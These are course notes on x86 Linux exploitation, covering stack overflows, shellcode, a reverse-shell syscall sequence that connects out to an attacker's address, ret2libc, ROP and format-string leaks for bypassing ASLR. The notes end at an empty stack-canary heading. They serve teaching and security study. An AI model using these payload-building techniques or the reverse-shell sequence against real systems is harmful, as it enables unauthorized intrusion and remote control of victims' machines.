Software Security and Exploitation Notes

Basic Concepts
- ELF (9/10)
- C Language (9/10)
- Memory (9/15)
- Processes Address Space (9/15)
- Process Execution (9/15)
- Registers (9/17)
- x86 Instructions (9/24)
- Exploitation Tools (9/24)
Control-Flow Hijacking (9/22)
Code Injection
- NOP Sled (9/29)
- jmp %esp (9/29)
- Register Spring (9/29)
Shellcode Development
- Shellcode (10/1)
- Writing Shellcode (10/1)
- Reverse Shell (10/6)
Non-Executable Memory | Code Reuse
- Non-Executable Memory (10/8)
- mprotect (10/8)
- system (10/15)
- ret2libc Chain (10/15)
Partial ASLR | Return-Oriented Programming
- Address Space Layout Randomization (10/20)
- Dynamic Linking (10/27)
- Return-Oriented Programming (10/27)

Basic Concepts

ELF

ELF (Executable and Linkable Format) is a binary file format. It is the standard for UNIX-like systems.

An ELF file can represent an executable, a shared library, an object file, or a core dump. (Static libraries are archives of ELF object files.)

An executable (EXEC) is a fully linked program with an entry point (which eventually calls main)
An object file (REL) is a compiled C file that has not been linked yet
A static library is linked at build time, which means that the code it provides is copied into the executable as a big blob
A dynamic shared library (DYN) is linked at load time and uses relative addresses, so it can be loaded at any address (e.g. libc)

ELF file contents:

The header contains metadata about the file, such as the type of file (executable, shared library, etc.), the architecture it is intended for, and the entry point address.
The section header table describes the sections in the file, such as:
- .text: executable code
- .data: initialized global data
- .bss: uninitialized global data
- .rodata: read-only global data, such as string literals
The program header table describes the segments, which are loaded into memory when the program runs. A segment can contain multiple sections.

[Figure: ELF file format]

readelf is a useful utility for examining the contents of ELF files. Run it with readelf -e <file> to print the ELF header, section headers, and program headers.
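To see the EXEC/REL/DYN distinction from code instead of readelf, the sketch below reads only the ELF identification bytes and the e_type field. It assumes a Linux system whose C library provides <elf.h> (glibc and musl do); elf_type is a hypothetical helper, not part of any library.

```c
#include <elf.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: return e_type (ET_REL, ET_EXEC, ET_DYN, ET_CORE)
 * of the ELF file at path, or -1 on error. e_type sits right after the
 * 16-byte e_ident in both 32-bit and 64-bit ELF headers, so reading a
 * 32-bit-sized header is enough for either class. */
int elf_type(const char *path)
{
    unsigned char hdr[sizeof(Elf32_Ehdr)];
    FILE *f = fopen(path, "rb");
    if (!f)
        return -1;
    size_t n = fread(hdr, 1, sizeof hdr, f);
    fclose(f);
    if (n < sizeof hdr || memcmp(hdr, ELFMAG, SELFMAG) != 0)
        return -1;                       /* too short or no \x7fELF magic */
    Elf32_Half type;
    memcpy(&type, hdr + EI_NIDENT, sizeof type);  /* little-endian on x86 */
    return type;
}
```

For example, elf_type("/proc/self/exe") should return ET_EXEC for a non-PIE build and ET_DYN for a position-independent one, matching the Type line that readelf -h prints.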

C Language

C compilation process:

The C preprocessor takes the source code (.c) and preprocesses it by inserting the contents of header files (#include), expanding macros (#define), and handling conditional compilation directives (#if, #else). This becomes an intermediate file (.i).
The C compiler takes the intermediate file and converts it to architecture-specific assembly (.s). GCC, for example, lowers the AST (GENERIC) to the GIMPLE IR, then to SSA (static single assignment) form, then to RTL, and finally to assembly code.
The assembler takes the assembly file, converts the assembly to machine code, and produces an object file (.o).
The linker takes one or more object files and combines them into a single executable file.
The loader loads the executable into memory and prepares it for execution. It sets up the necessary memory segments, resolves dynamic links (if any), and transfers control to the program's entry point (_start, which eventually calls main).

Note that in this process, the object files and the final executable are ELF files.

C constructs:

extern declares a symbol that is defined outside the current compilation unit
static (on a global variable or function) means internal to the compilation unit, so you cannot access it from other compilation units
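A single-file sketch of the two keywords, using hypothetical names. In a real project the extern declaration would normally live in a header that other .c files include.

```c
/* Hypothetical example names throughout. */

/* Declaration only: says "this int is defined somewhere" (here, just below). */
extern int shared_counter;

/* Definition with external linkage: other compilation units can use it. */
int shared_counter = 0;

/* Internal linkage: no other compilation unit can refer to this name. */
static int private_calls = 0;

/* static functions follow the same rule. */
static void bump_private(void) { private_calls++; }

int bump(void)
{
    bump_private();
    shared_counter += 10;
    return private_calls;
}
```

Running nm on the compiled object should list shared_counter with an uppercase (global) symbol type and private_calls with a lowercase (local) one.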

C data types:

Type	Size	Value
`void`	N/A	No value
`char`	1 byte	Character
`short`	2 bytes	Whole number
`int`	4 bytes	Whole number
`long`	4 bytes*	Whole number
`long long`	8 bytes	Whole number
`float`	4 bytes	Decimal number
`double`	8 bytes	Decimal number
`long double`	12 bytes*	Decimal number
`pointer`	4 bytes*	Address

*This is based on 32-bit x86 Linux. On 64-bit Linux, long and pointers are typically 8 bytes, and long double is 16 bytes.
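Because these sizes depend on the target, the quickest check is to ask the compiler. A minimal sketch with a hypothetical helper; build it once with cc -m32 and once without to compare the 32-bit and 64-bit columns.

```c
#include <stdio.h>

/* Hypothetical helper: print the size of each type in the table
 * for whatever target this file was compiled for. */
void print_type_sizes(void)
{
    printf("char         %zu\n", sizeof(char));
    printf("short        %zu\n", sizeof(short));
    printf("int          %zu\n", sizeof(int));
    printf("long         %zu\n", sizeof(long));
    printf("long long    %zu\n", sizeof(long long));
    printf("float        %zu\n", sizeof(float));
    printf("double       %zu\n", sizeof(double));
    printf("long double  %zu\n", sizeof(long double));
    printf("pointer      %zu\n", sizeof(void *));
}
```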


Memory

Memory can be referenced using its address, whose granularity and size depends on the architecture. In x86, every 8 bits (1 byte) of memory has its own address. In 32-bit systems, the address is 32 bits (4 bytes) long, and in 64-bit systems, the address is 64 bits (8 bytes) long.

This means that in x86 32-bit systems, there are 2^32 bytes = 4 GB of addressable memory. On Linux, around 1 GB is dedicated to the kernel and 3 GB to userland.

[Figure: Kernel and userland mappings]

Memory is allocated by the kernel. The granularity of allocatable memory also depends on the architecture. Linux allocates memory in pages, which are typically 4 KB in size. This matters because permission bits can only be set at the page level.

Virtual addresses are used for both resource management and process isolation. To translate virtual addresses to physical addresses, the operating system manages page tables and assigns them to each process. The hardware walks these tables and caches recent translations in the TLB (translation lookaside buffer).

TLDR: Addressable memory has a granularity of 1 byte, but allocatable memory has a granularity of 4 KB.
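Because permissions apply per page, anything that changes them (such as mprotect) needs a page-aligned address. A sketch of the arithmetic, assuming 4 KB pages; ASSUMED_PAGE_SIZE and both helpers are hypothetical, and on a live system sysconf(_SC_PAGESIZE) reports the real page size.

```c
#include <stdint.h>

/* Assumption: 4 KB pages, as on x86 Linux. Hypothetical constant. */
#define ASSUMED_PAGE_SIZE ((uintptr_t)4096)

/* Hypothetical helper: round an address down to the start of its page. */
uintptr_t page_base(uintptr_t addr)
{
    return addr & ~(ASSUMED_PAGE_SIZE - 1);
}

/* Hypothetical helper: offset of the address within its page (low 12 bits). */
uintptr_t page_offset(uintptr_t addr)
{
    return addr & (ASSUMED_PAGE_SIZE - 1);
}
```

For example, the byte at 0xbffffdb0 lives in the page starting at 0xbffff000, at offset 0xdb0 within it.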

Process Address Space

A process is a running instance of a program. Each process has its own virtual address space. There is 1 GB dedicated to kernel mappings and 3 GB dedicated to userland.

The stack grows from high addresses to low addresses, but data structures inside the stack (such as buffers) are filled from low addresses to high addresses, toward saved data like the return address. The heap grows from low addresses to high addresses.

The mmap region is the only region with DYN (dynamically linked) objects, such as shared libraries. It also has its own mmap heap for large or anonymous allocations.

[Figure: Process address space]
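On Linux, the layout above can be inspected from inside a process through /proc/self/maps, the same kind of listing GDB's info proc mappings shows. A Linux-only sketch; print_mappings is a hypothetical helper.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper (Linux-only): print this process's memory map and
 * return 1 if a [stack] region was listed, 0 if not, -1 on error.
 * Each line shows an address range, permissions (r/w/x/p), file offset,
 * device, inode, and a backing file or a label such as [heap] or [stack]. */
int print_mappings(void)
{
    FILE *f = fopen("/proc/self/maps", "r");
    if (!f)
        return -1;
    char line[512];
    int saw_stack = 0;
    while (fgets(line, sizeof line, f)) {
        fputs(line, stdout);
        if (strstr(line, "[stack]"))
            saw_stack = 1;
    }
    fclose(f);
    return saw_stack;
}
```

The output shows the main executable near the bottom, the heap above it, shared libraries such as libc in the mmap region, and [stack] near the top.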

Process Execution

The operating system reads the ELF file and does the following:

Calculate the number of pages needed for the process
Carve the address space into page-aligned segments with permissions
Copy allocatable bytes from the ELF file into the address space
If there is no INTERP program header (e.g. a statically linked binary), jump to the entry point of the main ELF file.
If there is an INTERP program header, also load the interpreter ELF file it names into the mmap region and jump to the interpreter's entry point.

From then on, the operating system is done.

The INTERP program header names the program interpreter, the dynamic linker that loads the binary's dynamically-linked library dependencies. For a 32-bit dynamically linked ELF file, readelf -l shows it like this: [Requesting program interpreter: /lib/ld-linux.so.2].

ld.so is this special helper, and it loads all other libraries into memory. Similar to the operating system, ld.so maps each required shared library, like libc.so, into the mmap region of memory, performs relocations, and then jumps to the entry point of the main executable.

Registers

x86 has 8 general-purpose registers (EAX, EBX, ECX, EDX, ESI, EDI, EBP, and ESP) and two special-purpose registers (EFLAGS, EIP).

%eip points at the next instruction to be executed
%esp points at the top of the stack
%eax contains the return value of functions
%ebp points at the base of the current stack frame

[Figure: Registers]

x86 Instructions

The x86 instruction set architecture (ISA) uses variable-length instructions (1 to 15 bytes), which makes instructions more difficult to decode.

The ISA can be written in either AT&T syntax or Intel syntax, but AT&T syntax is more common on UNIX-like systems.

e.g. mov %eax, %ebx in AT&T syntax (source first, then destination) is mov ebx, eax in Intel syntax. Both copy %eax into %ebx.

Symbol	Meaning
%eax	Register
$100	Constant (immediate)
0x100	Memory at absolute address 0x100
(%eax)	Memory at the address held in the register
offset(base, index, scale)	Memory at address offset + base + index * scale (scale is 1, 2, 4, or 8)

x86 uses little-endian format, which means that the least significant byte is stored at the lowest memory address.
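Little-endian order matters whenever an exploit writes an address into memory byte by byte. A sketch with a hypothetical helper:

```c
#include <stdint.h>

/* Hypothetical helper: store a 32-bit value in x86 (little-endian)
 * byte order, least significant byte at the lowest address. */
void store_le32(uint8_t out[4], uint32_t value)
{
    out[0] = (uint8_t)(value & 0xff);
    out[1] = (uint8_t)((value >> 8) & 0xff);
    out[2] = (uint8_t)((value >> 16) & 0xff);
    out[3] = (uint8_t)((value >> 24) & 0xff);
}
```

store_le32(b, 0xbffffdb0) produces the bytes b0 fd ff bf, which is how that address has to appear inside an overflow payload.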

Stack Frame

To initiate a function call, the caller makes a call <addr>, which:

Computes the return address, or the address of the next instruction after the call
Pushes the return address onto the stack in little endian
Loads %eip with the call target <addr>

To set up the new stack frame, the callee runs a prologue (equivalent to the enter instruction), which:

Pushes the old %ebp onto the stack
Sets the base pointer to the current top of the stack
Grows the stack down to allocate space for local variables

push   %ebp
mov    %esp,%ebp
sub    $0x218,%esp

To remove a stack frame, the callee has an epilogue (leave), which:

Copies %ebp to %esp
Pops the saved ebp from the stack back into %ebp

mov   %ebp, %esp
pop   %ebp

To transfer control back to the caller, the callee makes a ret, which:

Pops the return address from the top of the stack
Loads %eip with the return address
Resumes execution at the new %eip value

[Figure: Stack frame]

Parameters and local variables are referenced relative to the base pointer %ebp. Positive offsets access parameters (the first parameter is at 0x8(%ebp), above the saved %ebp at 0x0(%ebp) and the return address at 0x4(%ebp)), and negative offsets access local variables. For example, -0xc(%ebp) refers to a local variable 12 bytes below %ebp.

Parameters are pushed onto the stack in reverse order. For example, the read function takes 3 parameters: int fd, void *buf, and size_t nbytes. The assembly code to call read(0, buf, 0x40) looks like this:

push   $0x40
lea    -0x18(%ebp),%eax
push   %eax
push   $0x0
call   read

lea computes the address of its memory operand and loads that address into a register without dereferencing it. Here it loads the address of the local buffer at -0x18(%ebp), which is then pushed as buf.

Exploitation Tools

Terminal commands

as --32 program.s -o program.o assembles in 32-bit.
cc -m32 program.c -o program compiles in 32-bit.
ldd prints the shared libraries required by each program.
objdump -d <exec> disassembles executable files.
readelf -s <file> or nm <file> lists symbols from object files.

GDB

info proc mappings prints the memory mappings of the current process
disassemble main disassembles the main function
b *addr sets a breakpoint at the given address
si steps one instruction
printf "%x\n", $ebp+0x8 evaluates and prints expressions such as addresses
x/x 0xbffffdb0 examines memory at an address
x/i system examines memory as instructions

Control-flow hijacking

Control-flow hijacking is the exploitation of memory vulnerabilities to change the control flow of a program.

This is commonly done using stack buffer overflows. The stack holds return addresses, which the CPU pushes automatically during a call. Writing past the end of a stack buffer overwrites the saved %ebp and then the return address, so when the function executes ret, control jumps to an address the attacker chose.
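Combining the frame layout with little-endian order, a classic overflow payload for a buffer at -buf_off(%ebp) is filler up to %ebp, 4 more bytes over the saved %ebp, then the new return address. A sketch assuming a 32-bit frame where buf_off already counts everything between the buffer's start and %ebp; build_overflow and the filler byte 'A' are hypothetical choices.

```c
#include <stdint.h>
#include <string.h>

/* Hypothetical helper. Payload for a buffer at -buf_off(%ebp):
 *   [ filler: buf_off bytes ][ saved %ebp: 4 bytes ][ new return address ]
 * out must hold buf_off + 8 bytes. Returns the payload length. */
size_t build_overflow(uint8_t *out, size_t buf_off, uint32_t new_ret)
{
    memset(out, 'A', buf_off + 4);             /* buffer + saved %ebp */
    for (size_t i = 0; i < 4; i++)             /* return address, little-endian */
        out[buf_off + 4 + i] = (uint8_t)(new_ret >> (8 * i));
    return buf_off + 8;
}
```

For a buffer at -0x18(%ebp), like the one passed to read above, the payload is 32 bytes: 24 bytes of buffer, 4 bytes of saved %ebp, and the 4-byte address.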

Code Injection

Stack jitter refers to how much stack addresses change across runs because of environment variables and command-line arguments placed at the top of the process address space. This makes it unreliable to hardcode a stack address as the return address.

This problem can be mitigated by NOP sleds and jmp %esp.

NOP Sled

NOP sleds are sequences of NOP instructions (0x90) that slide the execution flow to the shellcode. NOP sleds let the exploit compensate for the shellcode landing at slightly different addresses due to different environment variables. But they do not entirely mitigate stack jitter, because you still need to guess an address inside the NOP landing pad, which is a specific stack address.

[Figure: NOP sled diagram]
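A sketch of laying out [ NOP sled ][ shellcode ] and checking whether a guessed return address falls inside the sled. build_sled and lands_in_sled are hypothetical helpers, and all addresses are supplied by the caller.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define NOP_OPCODE 0x90

/* Hypothetical helper: lay out [ NOP sled ][ shellcode ] in out, which must
 * hold sled_len + sc_len bytes. Returns the total length. */
size_t build_sled(uint8_t *out, size_t sled_len, const uint8_t *sc, size_t sc_len)
{
    memset(out, NOP_OPCODE, sled_len);
    memcpy(out + sled_len, sc, sc_len);
    return sled_len + sc_len;
}

/* Hypothetical helper: a guess works if it lands anywhere inside the sled,
 * because execution then slides through the NOPs into the shellcode. */
int lands_in_sled(uint32_t guess, uint32_t sled_start, size_t sled_len)
{
    return guess >= sled_start && guess - sled_start < sled_len;
}
```

A longer sled widens the window of acceptable guesses: with a 100-byte sled starting at 0xbffff000, any guess from 0xbffff000 to 0xbffff063 works.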

jmp %esp

In the jmp %esp technique, the return address is overwritten with the address of an existing jmp %esp instruction (bytes ff e4; written jmp *%esp in strict AT&T syntax). When ret executes, it pops the return address into %eip, which increments %esp by 4 bytes so that it points just past the overwritten return address. The jmp %esp then transfers control to that location, where the shellcode is placed. Note that the attacker needs to be able to write beyond the return address.

This reliably mitigates stack jitter because there is no need to guess a specific stack address. It always transfers control to wherever %esp currently points.

[Figure: jmp %esp]
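A usable jmp %esp only requires the two bytes ff e4 somewhere in executable, non-randomized memory; they do not have to be an instruction the compiler emitted. A sketch of the search, where find_jmp_esp is hypothetical and the code buffer would hold, e.g., the bytes of a .text section.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: return the offset of the first ff e4 (jmp *%esp)
 * byte pair in a code region, or -1 if there is none. */
long find_jmp_esp(const uint8_t *code, size_t len)
{
    for (size_t i = 0; i + 1 < len; i++)
        if (code[i] == 0xff && code[i + 1] == 0xe4)
            return (long)i;
    return -1;
}
```

The value to write over the return address is the region's load address plus the returned offset.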

Register Spring

A register spring uses any instruction that jumps to a register, such as jmp %eax or call %ebx. It is less constrained than jmp %esp.

This reliably mitigates stack jitter because it always transfers control to the location pointed by a specific register.
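Register springs share one encoding pattern: jmp *%reg is ff e0+r and call *%reg is ff d0+r, where r is the register number. A sketch of a decoder for these two-byte forms; decode_spring, print_spring, and REG_NAMES are hypothetical names.

```c
#include <stdint.h>
#include <stdio.h>

/* Hypothetical table: 32-bit registers in ModR/M register-number order. */
static const char *const REG_NAMES[8] = {
    "eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"
};

/* Hypothetical helper: if b0 b1 is jmp *%reg (ff e0+r) or call *%reg
 * (ff d0+r), set *is_call and return r (0-7); otherwise return -1. */
int decode_spring(uint8_t b0, uint8_t b1, int *is_call)
{
    if (b0 != 0xff)
        return -1;
    if ((b1 & 0xf8) == 0xe0)
        *is_call = 0;
    else if ((b1 & 0xf8) == 0xd0)
        *is_call = 1;
    else
        return -1;
    return b1 & 7;
}

/* Hypothetical helper: print the decoded spring in AT&T syntax. */
void print_spring(uint8_t b0, uint8_t b1)
{
    int is_call;
    int r = decode_spring(b0, b1, &is_call);
    if (r < 0)
        printf("%02x %02x: not a register spring\n", b0, b1);
    else
        printf("%02x %02x: %s *%%%s\n", b0, b1, is_call ? "call" : "jmp", REG_NAMES[r]);
}
```

For example, print_spring(0xff, 0xd3) prints that the bytes are call *%ebx, which works as a spring if %ebx points at the attacker's buffer.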

Shellcode Development

Shellcode

Shellcode is machine code that the attacker injects into memory they control (e.g. a stack buffer) and then executes by exploiting a memory corruption vulnerability.

Reverse shellcode connects back to the attacker's machine and gives the attacker a shell. Anything the attacker types is executed on the victim's machine; and anything the victim's machine outputs is sent back to the attacker.

Bind shellcode listens on a port and gives the attacker a shell when they connect to that port.

Writing Shellcode

Write the assembly. Assemble it. Then disassemble it to get the opcodes. A nice one-liner is as --32 program.s -o program.o && objdump -d program.o.

On 32-bit Linux, each system call maps its arguments to registers: put the syscall number in %eax and the arguments in %ebx, %ecx, %edx, %esi, %edi, and %ebp, in that order. Then invoke int $0x80. The return value will be in %eax.

Avoid null bytes (0x00). They can terminate strings early in functions like strcpy().

Tricks to remove null bytes:

Instead of mov $0x0, xor registers with themselves
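pushw can sometimes optimize out 00. e.g. pushw $0x0012 can be encoded as \x66\x6a\x12 (sign-extended 8-bit immediate) instead of \x66\x68\x12\x00 (16-bit immediate). This works for values up to 0x7f.
Because /bin/sh is 7 bytes, pushing it as two 4-byte words leaves a null byte in the padding. You can instead push /bin//sh, which is exactly 8 bytes; the extra slash does not change the path.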
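A sketch of two checks for the tricks above, using hypothetical helpers: has_null_byte flags a payload that strcpy() would truncate, and push_dword computes the immediate for push $imm32 so that four characters land in memory in order.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: 1 if the shellcode contains a 0x00 byte. */
int has_null_byte(const uint8_t *sc, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (sc[i] == 0x00)
            return 1;
    return 0;
}

/* Hypothetical helper: the dword whose little-endian bytes are s[0..3],
 * i.e. the immediate to use in push $imm32 for those four characters. */
uint32_t push_dword(const char s[4])
{
    return (uint32_t)(uint8_t)s[0]
         | (uint32_t)(uint8_t)s[1] << 8
         | (uint32_t)(uint8_t)s[2] << 16
         | (uint32_t)(uint8_t)s[3] << 24;
}
```

mov $0x0,%eax assembles to b8 00 00 00 00 and fails the null check, while xor %eax,%eax (31 c0) passes. Because the stack grows down, /bin//sh is built by pushing a zero word first (the terminator), then push_dword("//sh") = 0x68732f2f, then push_dword("/bin") = 0x6e69622f; %esp then points at the string.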

It might also be necessary to reduce payload size.

Tricks to reduce shellcode size:

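In mov, use the smallest register that fits the value: after zeroing %eax, mov $0xb, %al is 2 bytes (b0 0b), while mov $0xb, %eax is 5 bytes and contains null bytes (b8 0b 00 00 00)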

You can also look for strings in the .rodata section instead of pushing byte-by-byte

Find the string in the binary with strings -t x <file> | grep <string>

strings -t x exec | grep string
3008 string

Find the offset and address of .rodata section using readelf -S <file> | grep .rodata

readelf -S exec | grep .rodata
[15] .rodata           PROGBITS        0bf07000 003000 0001b2 00   A  0   0  4

Calculate the address of the string by summing address of the .rodata section with the offset of the string within .rodata.
```
0bf07000 + (3008 - 3000) = 0bf07008
```
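The same calculation as a function, with a bounds check against the section size that readelf -S also reports (0x1b2 above). rodata_string_addr is a hypothetical helper.

```c
#include <stdint.h>

/* Hypothetical helper: virtual address of a string whose file offset came
 * from strings -t x, given .rodata's address, file offset, and size from
 * readelf -S. Returns 0 if the offset is not inside .rodata. */
uint32_t rodata_string_addr(uint32_t rodata_addr, uint32_t rodata_off,
                            uint32_t rodata_size, uint32_t string_off)
{
    if (string_off < rodata_off || string_off - rodata_off >= rodata_size)
        return 0;
    return rodata_addr + (string_off - rodata_off);
}
```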

Reverse Shell

On the compromised machine, the shellcode:

Creates a socket
Changes stdin, stdout, and stderr to the socket
Connects to the attacker's machine
Executes /bin/sh

sfd = socket(PF_INET, SOCK_STREAM, 0);
dup2(sfd, 2); // stderr
dup2(sfd, 1); // stdout
dup2(sfd, 0); // stdin
connect(sfd, (struct sockaddr *)&sin, sizeof(sin)); // sin: attacker's IP and port
execve("/bin/sh", NULL, NULL);

Non-Executable Memory | Code Reuse

Non-Executable Memory

Around the early 2000s, processors started to support non-executable memory to mitigate code injection attacks. Page table entries now had 3 relevant permission bits:

Present (P)
Read/write (R/W)
No-execute (NX), which marks a page as not executable

However, the return address can still be overwritten to point to existing code in the program or libraries. This exploit is called code reuse, ret2libc, or whole function reuse.

mprotect

mprotect is a function in libc that can set the protection on a region of memory.

Add parameters for mprotect to make the stack executable (the address must be page-aligned)
Set mprotect's return address to the shellcode, so the shellcode runs when mprotect returns
Hijack the control flow to mprotect
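Concretely, the words written from the saved return address upward form a fake call frame for mprotect. A sketch assuming 32-bit cdecl, Linux's PROT_READ | PROT_WRITE | PROT_EXEC value of 7, and 4 KB pages; build_mprotect_frame is hypothetical, and the mprotect and shellcode addresses are inputs you would look up in GDB.

```c
#include <stdint.h>

#define ASSUMED_PAGE_SIZE 0x1000u   /* assumption: 4 KB pages */
#define RWX_PROT 7u                 /* PROT_READ | PROT_WRITE | PROT_EXEC on Linux */

/* Hypothetical helper. Words from the saved return address upward:
 *   [0] &mprotect   popped into %eip by the vulnerable function's ret
 *   [1] shellcode   mprotect's own return address
 *   [2] addr        page-aligned start of the region to change
 *   [3] len
 *   [4] prot                                                          */
void build_mprotect_frame(uint32_t out[5], uint32_t mprotect_addr,
                          uint32_t shellcode_addr, uint32_t len)
{
    out[0] = mprotect_addr;
    out[1] = shellcode_addr;
    out[2] = shellcode_addr & ~(ASSUMED_PAGE_SIZE - 1);
    out[3] = len;
    out[4] = RWX_PROT;
}
```

With shellcode at 0xbffff123, the frame asks mprotect to change the page starting at 0xbffff000. If the shellcode crosses a page boundary, len must cover both pages.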

system

system is a function in libc that executes a string as a command.

Add the string /bin/sh somewhere in memory
Add the address of /bin/sh as a parameter to system
Hijack the control flow to system

ret2libc Chain

We can also call multiple functions in a row through a ret2libc chain. At each link, we place on the stack, from low to high addresses:

The address of the function to call
The return address of the function
The arguments to the function

The return address of the function should be a gadget that pops the function's arguments off the stack (e.g. pop; pop; ret for two arguments) and then executes ret, which transfers control to the next function in the chain.

If the function argument is a pointer, make sure that you don't put it in the stack region that will be overwritten by new stack frames.

[Figure: ret2libc chain]
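A sketch of building such a chain as an array of 32-bit words, lowest address first. add_link is hypothetical, and the cleanup gadget passed for each link must pop exactly that link's arguments before its ret.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: append one link at chain[idx]:
 *   [func][cleanup gadget][arg0]...[arg(nargs-1)]
 * The cleanup gadget pops nargs words and then rets into the next
 * link's func. Returns the index just past this link. */
size_t add_link(uint32_t *chain, size_t idx, uint32_t func,
                uint32_t cleanup, const uint32_t *args, size_t nargs)
{
    chain[idx++] = func;
    chain[idx++] = cleanup;
    for (size_t i = 0; i < nargs; i++)
        chain[idx++] = args[i];
    return idx;
}
```

Calling add_link repeatedly with the returned index lays the links out back to back; the last link's return address can be anything harmless, such as exit.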

Partial ASLR | Return-Oriented Programming

Address Space Layout Randomization

Address space layout randomization (ASLR) is a probabilistic defense that randomizes the base addresses of regions of the address space each time a program runs.

Partial ASLR randomizes the stack, mmap, and heap. Full ASLR also randomizes the main executable.

Constraints:

Stack needs to be 16-byte aligned (19 bits of entropy)
mmap needs to be 4 KB aligned (8 bits of entropy)
brk needs to be 4 KB aligned (13 bits of entropy)

Dynamic Linking

[Figure: Dynamic linking]

Global offset table (GOT) contains the addresses of external functions and global variables
Procedure linkage table (PLT) contains stubs that jump to the addresses in the GOT

Here is the process of calling an external function:

An external function in the .text section is called using the .plt stub.
```
bf06327:       e8 14 2d 14 fc          call   8049040 <read@plt>
```
The .plt stub is a set of three instructions, which starts with an indirect jump through an address in the GOT.
```
08049040 <read@plt>:
8049040:       ff 25 4c 84 f0 0b       jmp    *0xbf0844c
8049046:       68 08 00 00 00          push   $0x8
804904b:       e9 d0 ff ff ff          jmp    8049020 <_init+0x20>
```
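If the function is being called for the first time, the GOT slot just points to the next instruction in the PLT stub, which pushes an identifier for the function's relocation entry ($0x8 here) and jumps to the first PLT entry, which calls the dynamic linker. The dynamic linker resolves the function's address and writes it into the GOT slot.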

If the function has been called before, the GOT slot will point to the actual function address.

Only functions used in the binary have PLT stubs. PLT addresses are not randomized by partial ASLR because they are part of the main executable.
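The lazy-binding behaviour can be modelled in portable C with a function pointer. This is a simplified model with hypothetical names, not how glibc's resolver is implemented: got_slot plays the GOT slot, plt_call the PLT stub, and resolver_stub the dynamic linker.

```c
/* Hypothetical model of lazy binding; all names are illustrative. */

typedef int (*fn_t)(int);

/* Stand-in for the library function whose address must be resolved. */
static int real_double(int x) { return 2 * x; }

static int resolver_stub(int x);
static int resolve_count = 0;

/* One GOT slot. Before the first call it points back to the
 * resolution path, like an unresolved slot in a real binary. */
static fn_t got_slot = resolver_stub;

/* Stand-in for the dynamic linker: find the real address, patch the
 * GOT slot, then finish the call that triggered resolution. */
static int resolver_stub(int x)
{
    resolve_count++;
    got_slot = real_double;
    return got_slot(x);
}

/* Stand-in for the PLT stub: always an indirect jump through the GOT. */
int plt_call(int x) { return got_slot(x); }

int resolver_invocations(void) { return resolve_count; }
```

The first plt_call goes through the resolver and patches the slot; later calls go straight to real_double. This mirrors why a real GOT slot holds the library function's address only after its first call.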

Return-Oriented Programming

A gadget is a sequence of instructions that ends with a ret. Return-oriented programming (ROP) involves chaining gadgets together to perform arbitrary computation. Often, this involves setting up the stack frame above the original return address.

To find unaligned gadgets, search for ret (c3) bytes. Then, backtrack a few bytes to find useful instructions. One tool that does this automatically is ROPgadget.
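A sketch of the first step, recording every c3 byte in a code region; find_ret_bytes is hypothetical. In the example bytes b8 58 c3 90 90, decoding from offset 0 gives mov $0x9090c358,%eax, but decoding from offset 1 gives pop %eax; ret, an unaligned gadget the compiler never intended.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: write the offset of every 0xc3 (ret) byte into out,
 * up to max entries, and return how many were found. Each offset ends a
 * candidate gadget; the bytes just before it are decoded by hand or by a
 * tool to see whether they form useful instructions. */
size_t find_ret_bytes(const uint8_t *code, size_t len, size_t *out, size_t max)
{
    size_t n = 0;
    for (size_t i = 0; i < len && n < max; i++)
        if (code[i] == 0xc3)
            out[n++] = i;
    return n;
}
```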

For partial ASLR, we can use ROP to set up arguments, particularly if they are memory addresses. Then we can call functions in the PLT, which is not randomized.

[Figure: Return-oriented programming]

Full ASLR | Just-In-Time Code Reuse

Full ASLR

Full ASLR randomizes the main executable in addition to everything that the partial ASLR randomizes. To have full ASLR, the main executable must not contain any absolute addresses; i.e. it must be position-independent code (PIC).

An executable with full ASLR is a DYN (Position-Independent Executable file). This is slightly different from library files, which are DYN (Shared object file).

Memory Disclosure

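In format strings, each %x reads the next 4-byte argument slot on the stack and prints it as a hexadecimal number. If the attacker controls the format string and no matching arguments are passed, successive %x conversions walk up the stack and leak its contents, which can include the return address. This creates a memory disclosure vulnerability.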

printf("XXXX %x %x %x %x");

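In practice, the input may not have room for enough %x conversions to reach the return address, and an overly long input can overflow the buffer and overwrite the return address before we get to read it. Instead, we should use the %N$x notation, which prints the Nth argument slot directly, to read specific stack locations.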

printf("%138$x")
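The positional syntax can be seen safely with real arguments, where the output is well defined. A sketch with a hypothetical helper; the %N$ form is a POSIX extension supported by glibc, not part of ISO C.

```c
#include <stdio.h>

/* Hypothetical helper: %N$x selects the Nth argument directly instead of
 * consuming arguments in order. Writes "cc bb aa" into buf. */
int positional_demo(char *buf, size_t len)
{
    return snprintf(buf, len, "%3$x %2$x %1$x", 0xaau, 0xbbu, 0xccu);
}
```

In the attack no arguments are passed at all, so %138$x instead prints whatever 4-byte value sits in the 138th argument slot on the stack.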

Just-In-Time Code Reuse

Get the return address through a memory disclosure vulnerability.
Calculate the base address of the main executable by subtracting the return address's offset (its distance from the start of the executable) from the leaked return address.

In other words, base addr = return addr - offset. We can find this offset using info proc mappings in GDB.
Calculate the addresses of gadgets and functions in the main executable

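Note that gadgets must be taken from the main executable, not from libraries, because libraries are randomized independently. Gadgets and functions will have fixed offsets from the base address, which can be read from the disassembly (objdump -d <executable>) or the symbol table (readelf -s <executable>).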
Use a ROP chain to call functions in the PLT once again.

[Figure: Just-in-time code reuse]
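The arithmetic in these steps, as a sketch with hypothetical helper names and example values; ret_offset is the value measured once in GDB.

```c
#include <stdint.h>

/* Hypothetical helper: base of the randomized main executable from one
 * leaked return address. ret_offset = return address - executable base,
 * measured once with info proc mappings; it is the same on every run. */
uint32_t exe_base(uint32_t leaked_ret, uint32_t ret_offset)
{
    return leaked_ret - ret_offset;
}

/* Hypothetical helper: runtime address of a gadget or PLT stub at a fixed
 * offset inside the executable. */
uint32_t rebase(uint32_t base, uint32_t offset)
{
    return base + offset;
}
```

A leaked return address of 0x565561f3 with offset 0x11f3 gives a base of 0x56555000. Since the executable is mapped at a page boundary, a computed base whose low 12 bits are not zero points to a wrong offset.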

Note that GDB disables ASLR by default. To enable it, run set disable-randomization off.

Stack Canaries/Cookies

Stack Canaries

